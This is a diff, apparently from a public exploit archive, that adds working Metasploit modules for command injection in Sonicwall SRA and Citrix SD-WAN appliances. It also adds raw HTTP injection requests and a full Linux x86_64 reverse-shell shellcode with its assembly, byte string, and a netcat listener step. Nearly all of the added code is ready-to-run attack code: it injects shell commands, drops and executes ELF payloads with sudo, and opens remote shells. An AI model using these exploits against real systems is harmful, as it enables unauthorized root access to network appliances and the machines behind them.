+Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=license; swap=dEVySFNhTXl5V3NLSXNWUFUzVzBNNTJJQ1o2WXpCODNrOGZYUGxYazJOZz0=
+
+
+Exploit #2 -----------------------------------------------------------------
+
+GET /cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23 HTTP/1.1
+Host: 192.168.84.155
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: https://192.168.84.155/cgi-bin/diagnostics
+Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=sslcert; swap=dDdWMjhSYzlzMEZBd3kwQ29rTzZxQWFKdmxUSU5SRFVBQTRGRWk5UzJXVT0=
+
+
+Timeline:
+11/14/16 - Discovered in audit
+11/20/16 - POC msf exploit written
+11/28/16 - Contacted mitre for CVE
+11/30/16 - CVE received from mitre (CVE-2016-9682)
+11/30/16 - Dell notified through Sonicwall vuln reporting
+
+
+
+
diff --git a/platforms/cgi/webapps/42343.rb b/platforms/cgi/webapps/42343.rb
new file mode 100755
index 000000000..38bbaff2a
--- /dev/null
+++ b/platforms/cgi/webapps/42343.rb
@@ -0,0 +1,196 @@
+# Exploit Title: Sonicwall gencsr CGI Remote Command Injection Vulnerablity
+# Date: 12/24/2016
+# Exploit Author: xort @ Critical Start
+# Vendor Homepage: www.sonicwall.com
+# Software Link: sonicwall.com/products/sra-virtual-appliance
+# Version: 8.1.0.6-21sv
+# Tested on: 8.1.0.2-14sv
+#
+# CVE : (awaiting cve)
+
+# vuln: viewcert.cgi / CERT parameter
+
+# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug.
+#
+# xort @ Critical Start
+
+
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv gencsr.cgi remote exploit',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in
+ the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in
+ a section of the machine's adminstrative infertface for performing configurations
+ related to on-connect scripts to be launched for users's connecting.
+ },
+ 'Author' =>
+ [
+ 'xort@Critical Start', # vuln + metasploit module
+ ],
+ 'Version' => '$Revision: 1 $',
+ 'References' =>
+ [
+ [ 'none', 'none'],
+ ],
+ 'Platform' => [ 'linux'],
+ 'Privileged' => true,
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'Privileged' => false,
+
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ }
+ },
+
+ 'Targets' =>
+ [
+ ['Linux Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ false, 'Device password', "" ]),
+ OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
+ OptString.new('CMD', [ false, 'Command to execute', "" ]),
+ Opt::RPORT(443),
+ ], self.class)
+ end
+
+ def do_login(username, password_clear)
+ vprint_status( "Logging into machine with credentials...\n" )
+
+ # vars
+ timeout = 1550;
+
+ # send request
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/userLogin",
+ 'headers' => {
+ 'Connection' => 'close',
+ 'Content-Type' => 'application/x-www-form-urlencoded',
+ 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
+ },
+ 'vars_post' => {
+ 'username' => username,
+ 'password' => password_clear,
+ 'domain' => 'LocalDomain',
+ 'loginButton' => 'Login',
+ 'state' => 'login',
+ 'login' => 'true',
+ 'VerifyCert' => '0',
+ 'portalname' => 'VirtualOffice',
+ 'ajax' => 'true'
+ },
+
+ }, timeout)
+
+ swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
+
+ return swap
+ end
+
+
+ def run_command(swap_cookie, cmd)
+
+ # vars
+ timeout = 1550;
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/gencsr",
+ 'data' => "country=USA&san=ASDF&fqdn=www.google.com&county=dallas&applyButt=applyButt%3d&password=xxx&fullsan=xxx&organization=xxx&name=xxx&state=xxx&department=xxx&email=x@x.com&key_size=`#{cmd}`",
+
+ 'headers' =>
+ {
+ 'Cookie' => "swap=#{swap_cookie}",
+ },
+ }, timeout)
+ end
+
+ def run_command_spliced(swap_cookie, cmd)
+
+ write_mode = ">"
+ dump_file = "/tmp/qq"
+ reqs = 0
+
+ cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ for cmd_chunk in cmd_encoded.split(/(..................................................)/)
+
+ cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}"
+ reqs += 1
+
+ vprint_status("Running Command (#{reqs})\n")
+
+ # set to normal append for loops after the first round
+ if write_mode == ">"
+ write_mode = ">>"
+ end
+
+ # add cmd to array to be exected later
+ run_command(swap_cookie, cmd_new)
+ end
+
+ # execute payload stored at dump_file
+ run_command(swap_cookie, "chmod +x /tmp/qq; sh /tmp/qq")
+
+ end
+
+ def exploit
+ # timeout
+ timeout = 1550;
+
+ # params
+ password_clear = datastore['PASSWORD']
+ user = datastore['USERNAME']
+
+ # do authentication
+ swap_cookie = do_login(user, password_clear)
+
+ vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
+
+ #if no 'CMD' string - add code for root shell
+ if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+
+ cmd = datastore['CMD']
+
+ # Encode cmd payload
+ encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ # kill stale calls to bdump from previous exploit calls for re-use
+ run_command(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" ))
+
+ else
+ # Encode payload to ELF file for deployment
+ elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ run_command_spliced(swap_cookie, "printf \"#{encoded_elf}\">/tmp/m;chmod +rx /tmp/m;/tmp/m")
+
+ # wait for magic
+ handler
+ end
+ end
+end
diff --git a/platforms/cgi/webapps/42344.rb b/platforms/cgi/webapps/42344.rb
new file mode 100755
index 000000000..1d1b35deb
--- /dev/null
+++ b/platforms/cgi/webapps/42344.rb
@@ -0,0 +1,316 @@
+# Exploit Title: Sonicwall importlogo/sitecustomization CGI Remote Command Injection Vulnerablity
+# Date: 12/25/2016
+# Exploit Author: xort @ Critical Start
+# Vendor Homepage: www.sonicwall.com
+# Software Link: sonicwall.com/products/sra-virtual-appliance
+# Version: 8.1.0.2-14sv
+# Tested on: 8.1.0.2-14sv
+#
+# CVE : (awaiting cve)
+
+# vuln1: importlogo.cgi / logo1 parameter (any contents can be uploaded)
+# vuln2: sitecustomization.cgi / portalname (filename) parameter
+
+# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug.
+#
+# xort @ Critical Start
+
+
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv remote exploit',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in
+ the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in
+ a section of the machine's adminstrative infertface for performing configurations
+ related to on-connect scripts to be launched for users's connecting.
+ },
+ 'Author' =>
+ [
+ 'xort@Critical Start', # vuln + metasploit module
+ ],
+ 'Version' => '$Revision: 1 $',
+ 'References' =>
+ [
+ [ 'none', 'none'],
+ ],
+ 'Platform' => [ 'linux'],
+ 'Privileged' => true,
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'Privileged' => false,
+
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ }
+ },
+
+ 'Targets' =>
+ [
+ ['Linux Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ false, 'Device password', "" ]),
+ OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
+ OptString.new('CMD', [ false, 'Command to execute', "" ]),
+ Opt::RPORT(443),
+ ], self.class)
+ end
+
+ def do_login(username, password_clear)
+ vprint_status( "Logging into machine with credentials...\n" )
+
+ # vars
+ timeout = 1550;
+
+ # send request
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/userLogin",
+ 'headers' => {
+ 'Connection' => 'close',
+ 'Content-Type' => 'application/x-www-form-urlencoded',
+ 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
+ },
+ 'vars_post' => {
+ 'username' => username,
+ 'password' => password_clear,
+ 'domain' => 'LocalDomain',
+ 'loginButton' => 'Login',
+ 'state' => 'login',
+ 'login' => 'true',
+ 'VerifyCert' => '0',
+ 'portalname' => 'VirtualOffice',
+ 'ajax' => 'true'
+ },
+ }, timeout)
+
+ swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
+
+ return swap
+ end
+
+ def upload_payload(swap_cookie, file_data)
+ vprint_status( "Upload Payload..." )
+
+ # vars
+ timeout = 1550;
+
+ upload_req = [
+ [ "portalName","VirtualOffice" ],
+ [ "defaultLogo","0" ],
+ [ "uiVersion","2" ],
+ [ "bannerBackground", "light" ]
+ ]
+
+ boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
+ post_data = ""
+
+ # assemble upload_req parms
+ upload_req.each do |xreq|
+ post_data << "--#{boundary}\r\n"
+ post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
+ post_data << "#{xreq[1]}\r\n"
+ end
+
+ # add malicious file
+ post_data << "--#{boundary}\r\n"
+ post_data << "Content-Disposition: form-data; name=\"logo1\"; filename=\"x.jpg\"\r\n"
+ post_data << "Content-Type: image/jpeg\r\n\r\n"
+ post_data << "#{file_data}\r\n"
+
+ post_data << "--#{boundary}--\r\n"
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/importlogo?uploadId=1",
+ 'ctype' => "multipart/form-data; boundary=#{boundary}",
+ 'data' => post_data,
+ 'headers' =>
+ {
+ 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
+ 'Cookie' => 'swap='+swap_cookie+';',
+ }
+ }, timeout)
+
+
+ end
+
+
+ def run_command(swap_cookie, cmd)
+
+ vprint_status( "Running Command...\n" )
+
+ # vars
+ timeout = 1550;
+
+ vprint_status("creating filename on target: #{cmd}\n")
+
+ upload_req = [
+ [ "portalname", cmd ],
+ [ "portaltitle","Virtual Office" ],
+ [ "bannertitle","Virtual Office" ],
+ [ "bannermessage","Dell Sonicwall
" ],
+ [ "portalUrl","https://192.168.84.155/portal/xxx" ],
+ [ "loginflag","on" ],
+ [ "bannerflag","on" ],
+ [ "httpOnlyCookieFlag","on" ],
+ [ "cachecontrol","on" ],
+ [ "uniqueness", "on" ],
+ [ "duplicateLoginAction", "1" ],
+ [ "livetilesmalllogo", "" ],
+ [ "livetilemediumlogo", "" ],
+ [ "livetilewidelogo", "" ],
+ [ "livetilelargelogo", "" ],
+ [ "livetilebackground", "#0085C3" ],
+ [ "livetilename", "" ],
+ [ "home2page", "on" ],
+ [ "allowNetExtender", "on" ],
+ [ "virtualpassagepage", "on" ],
+ [ "cifsdirectpage", "on" ],
+ [ "cifspage", "on" ],
+ [ "cifsappletpage", "on" ],
+ [ "cifsapplet", "on" ],
+ [ "cifsdefaultfilesharepath", "" ],
+ [ "home3page", "on" ],
+ [ "showAllBookmarksTab", "on" ],
+ [ "showDefaultTabs", "on" ],
+ [ "showCopyright", "on" ],
+ [ "showSidebar", "on" ],
+ [ "showUserPortalHelpButton", "on" ],
+ [ "userPortalHelpURL", "" ],
+ [ "showUserPortalOptionsButton", "on" ],
+ [ "homemessage", "Welcome to the Dell SonicWALL Virtual Office
" ],
+ [ "hptabletitle", "Virtual Office Bookmarks" ],
+ [ "vhostName", "www.#{Rex::Text.rand_text_hex(32)}.com" ],
+ [ "vhostAlias", "" ],
+ [ "vhostInterface", "ALL" ],
+ [ "vhostEnableKeepAlive", "on" ],
+ [ "cdssodn", ".yahoo.com" ],
+ [ "enableSSLForwardSecrecy", "0" ],
+ [ "enableSSLProxyVerify", "0" ],
+ [ "sslProxyProtocol", "0" ],
+ [ "loginSchedule", "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" ],
+ [ "formsection", "main" ],
+ [ "doAdd", "1" ],
+ [ "cgiaction", "1" ],
+ [ "themename", "stylesonicwall" ],
+ [ "onlinehelp", "" ],
+ [ "tmp_currentVhostName", "" ],
+ [ "tmp_currentVhostAlias", "" ],
+ [ "tmp_currentVhostInterface", "ALL" ],
+ [ "tmp_currentVhostIp", "" ],
+ [ "tmp_currentVhostIPv6", "" ],
+ [ "tmp_currentVhostEnableHTTP", "0" ],
+ [ "tmp_currentVhostEnableKeepAlive", "1" ],
+ [ "tmp_currentVhostCert", "" ],
+ [ "tmp_currEnforceSSLProxyProtocol", "0" ],
+ [ "tmp_currSSLProxyProtocol", "0" ],
+ [ "tmp_currEnableSSLProxyVerify", "0" ],
+ [ "tmp_currEnableSSLForwardSecrecy", "0" ],
+ [ "tmp_currentVhostOffloadRewrite", "" ],
+ [ "restartWS", "1" ],
+ [ "reuseFavicon", "" ],
+ [ "oldReuseFavicon", "" ],
+ ]
+
+ boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
+ post_data = ""
+
+ # assemble upload_req parms
+ upload_req.each do |xreq|
+ post_data << "--#{boundary}\r\n"
+ post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
+ post_data << "#{xreq[1]}\r\n"
+ end
+
+ post_data << "--#{boundary}--\r\n"
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/sitecustomization",
+ 'ctype' => "multipart/form-data; boundary=#{boundary}",
+ 'data' => post_data,
+ 'headers' =>
+ {
+ 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
+ 'Cookie' => 'swap='+swap_cookie+';',
+ }
+ }, timeout)
+ end
+
+ def run_command_file(swap_cookie)
+
+ # use prefix so exploit can be re-used (unique portalname requirment)
+ prefix = Rex::Text.rand_text_numeric(5)
+
+ run_command(swap_cookie, "#{prefix}$({find,$({perl,-e,'print(chr(0x2f))'}),-name,VirtualOffice.gif,-exec,cp,{},qz,$({perl,-e,'print(chr(0x3b))'})})")
+ run_command(swap_cookie, "#{prefix}$({chmod,777,qz})")
+ run_command(swap_cookie, "#{prefix}$({sh,-c,.$({perl,-e,'print(chr(0x2f))'})qz})")
+
+ end
+
+ def exploit
+ # timeout
+ timeout = 1550;
+
+ # params
+ password_clear = datastore['PASSWORD']
+ user = datastore['USERNAME']
+
+ # do authentication
+ swap_cookie = do_login(user, password_clear)
+
+ vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
+
+ # pause to let things run smoothly
+ #sleep(5)
+
+ #if no 'CMD' string - add code for root shell
+ if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+
+ cmd = datastore['CMD']
+
+ # Encode cmd payload
+ encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ # kill stale calls to bdump from previous exploit calls for re-use
+ upload_payload(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" ))
+ else
+ # Encode payload to ELF file for deployment
+ elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
+ upload_payload(swap_cookie, ("#!/bin/bash\necho -e \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m; /tmp/m"))
+ run_command_file(swap_cookie)
+
+ # wait for magic
+ handler
+
+ end
+
+
+ end
+end
diff --git a/platforms/cgi/webapps/42345.rb b/platforms/cgi/webapps/42345.rb
new file mode 100755
index 000000000..4c20a2a24
--- /dev/null
+++ b/platforms/cgi/webapps/42345.rb
@@ -0,0 +1,140 @@
+# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity
+# Date: 02/20/2017
+# Exploit Author: xort @ Critical Start
+# Vendor Homepage: www.citrix.com
+# Software Link: https://www.citrix.com/downloads/cloudbridge/
+# Version: 9.1.2.26.561201
+# Tested on: 9.1.2.26.561201 (OS partition 4.6)
+#
+# CVE : (awaiting cve)
+
+# vuln: CGISESSID Cookie parameter
+# associated vuln urls:
+# /global_data/
+# /global_data/headerdata
+# /log
+# /
+# /r9-1-2-26-561201/configuration/
+# /r9-1-2-26-561201/configuration/edit
+# /r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
+#
+# Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug.
+#
+# xort @ Critical Start
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Citrix SD-WAN CGISESSID Cookie Remote Root',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <= v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized.
+ },
+ 'Author' =>
+ [
+ 'xort@Critical Start', # vuln + metasploit module
+ ],
+ 'Version' => '$Revision: 1 $',
+ 'References' =>
+ [
+ [ 'none', 'none'],
+ ],
+ 'Platform' => [ 'linux'],
+ 'Privileged' => true,
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ }
+ },
+
+ 'Targets' =>
+ [
+ ['Linux Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('CMD', [ false, 'Command to execute', "" ]),
+ Opt::RPORT(443),
+ ], self.class)
+ end
+
+ def run_command(cmd)
+
+ vprint_status( "Running Command...\n" )
+
+ # send request with payload
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/global_data/",
+ 'vars_post' => {
+ 'action' => 'logout'
+ },
+ 'headers' => {
+ 'Connection' => 'close',
+ 'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;',
+ }
+
+ })
+
+
+ # pause to let things run smoothly
+ sleep(2)
+
+
+ end
+
+
+ def exploit
+ # timeout
+ timeout = 1550;
+
+ # pause to let things run smoothly
+ sleep(2)
+
+ #if no 'CMD' string - add code for root shell
+ if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+
+ cmd = datastore['CMD']
+
+ # Encode cmd payload
+
+ encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
+
+ # upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)
+ run_command("echo -e #{encoded_cmd}>/tmp/n")
+ run_command("chmod 755 /tmp/n")
+ run_command("sudo /tmp/n")
+ else
+ # Encode payload to ELF file for deployment
+ elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
+
+ # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
+ run_command("echo -e #{encoded_elf}>/tmp/m")
+ run_command("chmod 755 /tmp/m")
+ run_command("sudo /tmp/m")
+
+ # wait for magic
+ handler
+
+ end
+
+
+ end
+end
diff --git a/platforms/cgi/webapps/42346.txt b/platforms/cgi/webapps/42346.txt
new file mode 100755
index 000000000..e6a983872
--- /dev/null
+++ b/platforms/cgi/webapps/42346.txt
@@ -0,0 +1,12 @@
+POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
+Host: 10.242.129.149
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
+Cookie: CAKEPHP=`sleep 10`
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 13
+
+action=logout
\ No newline at end of file
diff --git a/platforms/hardware/remote/27320.txt b/platforms/hardware/webapps/27320.txt
similarity index 100%
rename from platforms/hardware/remote/27320.txt
rename to platforms/hardware/webapps/27320.txt
diff --git a/platforms/hardware/remote/33740.txt b/platforms/hardware/webapps/33740.txt
similarity index 100%
rename from platforms/hardware/remote/33740.txt
rename to platforms/hardware/webapps/33740.txt
diff --git a/platforms/hardware/remote/36286.txt b/platforms/hardware/webapps/36286.txt
similarity index 100%
rename from platforms/hardware/remote/36286.txt
rename to platforms/hardware/webapps/36286.txt
diff --git a/platforms/hardware/remote/36865.txt b/platforms/hardware/webapps/36865.txt
similarity index 100%
rename from platforms/hardware/remote/36865.txt
rename to platforms/hardware/webapps/36865.txt
diff --git a/platforms/hardware/remote/37982.pl b/platforms/hardware/webapps/37982.pl
similarity index 100%
rename from platforms/hardware/remote/37982.pl
rename to platforms/hardware/webapps/37982.pl
diff --git a/platforms/hardware/remote/38604.txt b/platforms/hardware/webapps/38604.txt
similarity index 100%
rename from platforms/hardware/remote/38604.txt
rename to platforms/hardware/webapps/38604.txt
diff --git a/platforms/hardware/remote/38853.sh b/platforms/hardware/webapps/38853.sh
similarity index 100%
rename from platforms/hardware/remote/38853.sh
rename to platforms/hardware/webapps/38853.sh
diff --git a/platforms/lin_x86-64/shellcode/42339.c b/platforms/lin_x86-64/shellcode/42339.c
new file mode 100755
index 000000000..a54674071
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/42339.c
@@ -0,0 +1,155 @@
+/*
+;Category: Shellcode
+;Title: GNU/Linux x86_64 - Reverse Shell Shellcode
+;Author: m4n3dw0lf
+;Github: https://github.com/m4n3dw0lf
+;Date: 18/07/2017
+;Architecture: Linux x86_64
+;Tested on: #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux
+
+##########
+# Source #
+##########
+
+section .text
+ global _start
+ _start:
+ push rbp
+ mov rbp,rsp
+ xor rdx, rdx
+ push 1
+ pop rsi
+ push 2
+ pop rdi
+ push 41
+ pop rax ; sys_socket
+ syscall
+ sub rsp, 8
+ mov dword [rsp], 0x5c110002 ; Port 4444, 4Bytes: 0xPORT + Fill with '0's + 2
+ mov dword [rsp+4], 0x801a8c0 ; IP Address 192.168.1.8, 4Bytes: 0xIPAddress (Little Endiannes)
+ lea rsi, [rsp]
+ add rsp, 8
+ pop rbx
+ xor rbx, rbx
+ push 16
+ pop rdx
+ push 3
+ pop rdi
+ push 42
+ pop rax; sys_connect
+ syscall
+ xor rsi, rsi
+ shell_loop:
+ mov al, 33
+ syscall
+ inc rsi
+ cmp rsi, 2
+ jle shell_loop
+ xor rax, rax
+ xor rsi, rsi
+ mov rdi, 0x68732f6e69622f2f
+ push rsi
+ push rdi
+ mov rdi, rsp
+ xor rdx, rdx
+ mov al, 59
+ syscall
+
+#################################
+# Compile and execute with NASM #
+#################################
+
+nasm -f elf64 reverse_tcp_shell.s -o reverse_tcp_shell.o
+ld reverse_tcp_shell.o -o reverse_tcp_shell
+
+#########################
+# objdump --disassemble #
+#########################
+
+reverse_tcp_shell: file format elf64-x86-64
+
+
+Disassembly of section .text:
+
+0000000000400080 <_start>:
+ 400080: 55 push %rbp
+ 400081: 48 89 e5 mov %rsp,%rbp
+ 400084: 48 31 d2 xor %rdx,%rdx
+ 400087: 6a 01 pushq $0x1
+ 400089: 5e pop %rsi
+ 40008a: 6a 02 pushq $0x2
+ 40008c: 5f pop %rdi
+ 40008d: 6a 29 pushq $0x29
+ 40008f: 58 pop %rax
+ 400090: 0f 05 syscall
+ 400092: 48 83 ec 08 sub $0x8,%rsp
+ 400096: c7 04 24 02 00 11 5c movl $0x5c110002,(%rsp)
+ 40009d: c7 44 24 04 c0 a8 01 movl $0x801a8c0,0x4(%rsp)
+ 4000a4: 08
+ 4000a5: 48 8d 34 24 lea (%rsp),%rsi
+ 4000a9: 48 83 c4 08 add $0x8,%rsp
+ 4000ad: 5b pop %rbx
+ 4000ae: 48 31 db xor %rbx,%rbx
+ 4000b1: 6a 10 pushq $0x10
+ 4000b3: 5a pop %rdx
+ 4000b4: 6a 03 pushq $0x3
+ 4000b6: 5f pop %rdi
+ 4000b7: 6a 2a pushq $0x2a
+ 4000b9: 58 pop %rax
+ 4000ba: 0f 05 syscall
+ 4000bc: 48 31 f6 xor %rsi,%rsi
+
+00000000004000bf :
+ 4000bf: b0 21 mov $0x21,%al
+ 4000c1: 0f 05 syscall
+ 4000c3: 48 ff c6 inc %rsi
+ 4000c6: 48 83 fe 02 cmp $0x2,%rsi
+ 4000ca: 7e f3 jle 4000bf
+ 4000cc: 48 31 c0 xor %rax,%rax
+ 4000cf: 48 31 f6 xor %rsi,%rsi
+ 4000d2: 48 bf 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%rdi
+ 4000d9: 2f 73 68
+ 4000dc: 56 push %rsi
+ 4000dd: 57 push %rdi
+ 4000de: 48 89 e7 mov %rsp,%rdi
+ 4000e1: 48 31 d2 xor %rdx,%rdx
+ 4000e4: b0 3b mov $0x3b,%al
+ 4000e6: 0f 05 syscall
+
+
+#######################
+# 104 Bytes Shellcode #
+#######################
+
+for i in `objdump -d reverse_tcp_shell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
+
+\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05
+
+########
+# Test #
+########
+
+In the asm source:
+ mov dword [rsp+4], 0x801a8c0
+
+In the host that will receive the shell run:
+ nc -vvlp 4444
+
+On the target machine:
+ compile with:
+ gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
+ run:
+ ./reverse_tcp_shell
+
+
+ gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
+*/
+
+#include
+
+unsigned char shellcode[] = "\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
+main()
+{
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
diff --git a/platforms/linux/remote/14818.pl b/platforms/linux/webapps/14818.pl
similarity index 100%
rename from platforms/linux/remote/14818.pl
rename to platforms/linux/webapps/14818.pl
diff --git a/platforms/linux/remote/18932.py b/platforms/linux/webapps/18932.py
similarity index 100%
